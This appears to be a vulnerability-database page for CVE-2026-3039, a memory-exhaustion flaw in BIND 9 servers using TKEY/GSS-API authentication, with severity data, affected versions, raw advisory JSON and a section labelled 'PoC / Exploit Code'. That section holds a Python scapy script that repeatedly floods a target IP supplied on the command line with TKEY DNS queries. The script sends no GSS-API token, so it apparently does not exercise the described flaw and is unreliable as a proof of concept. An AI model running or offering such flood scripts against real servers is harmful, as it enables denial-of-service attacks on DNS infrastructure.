Security Vulnerability Report
中文
CVE-2026-3039 CVSS 7.5 HIGH

CVE-2026-3039

Published: 2026-05-20 13:16:24
Last Modified: 2026-05-20 14:04:57
Source: [email protected]

Description

BIND servers that are configured to use TKEY-based authentication via GSS-API tokens are vulnerable to excessive memory consumption when receiving and processing maliciously-constructed packets. Typically these servers will be found in Active Directory integrated DNS deployments and/or Kerberos-secured DNS environments. This issue affects BIND 9 versions 9.0.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.9.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

BIND 9.0.0 - 9.16.50
BIND 9.18.0 - 9.18.48
BIND 9.20.0 - 9.20.22
BIND 9.21.0 - 9.21.21
BIND 9.9.3-S1 - 9.16.50-S1
BIND 9.18.11-S1 - 9.18.48-S1
BIND 9.20.9-S1 - 9.20.22-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2026-3039 (BIND 9 TKEY Memory Exhaustion) This script sends a crafted DNS packet with a TKEY query to trigger excessive memory consumption. """ import sys from scapy.all import IP, UDP, DNS, DNSQR, send def send_exploit(target_ip, target_port=53): # Construct a DNS query with TKEY type # TKEY type code is 249 pkt = IP(dst=target_ip) / UDP(dport=target_port) / DNS( id=0x1337, qr=0, opcode=0, rd=1, qdcount=1, qd=DNSQR(qname="example.com", qtype="TKEY", qclass="IN") ) print(f"[*] Sending malicious packet to {target_ip}...") # Send packets in a loop to exhaust memory faster try: send(pkt, loop=1, inter=0.05, verbose=0) except KeyboardInterrupt: print("\n[!] Stopped.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python3 cve-2026-3039.py <target_ip>") sys.exit(1) send_exploit(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3039", "sourceIdentifier": "[email protected]", "published": "2026-05-20T13:16:23.647", "lastModified": "2026-05-20T14:04:57.320", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "BIND servers that are configured to use TKEY-based authentication via GSS-API tokens are vulnerable to excessive memory consumption when receiving and processing maliciously-constructed packets. Typically these servers will be found in Active Directory integrated DNS deployments and/or Kerberos-secured DNS environments.\nThis issue affects BIND 9 versions 9.0.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.9.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-771"}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.18.49", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.20.23", "source": "[email protected]"}, {"url": "https://downloads.isc.org/isc/bind9/9.21.22", "source": "[email protected]"}, {"url": "https://kb.isc.org/docs/cve-2026-3039", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.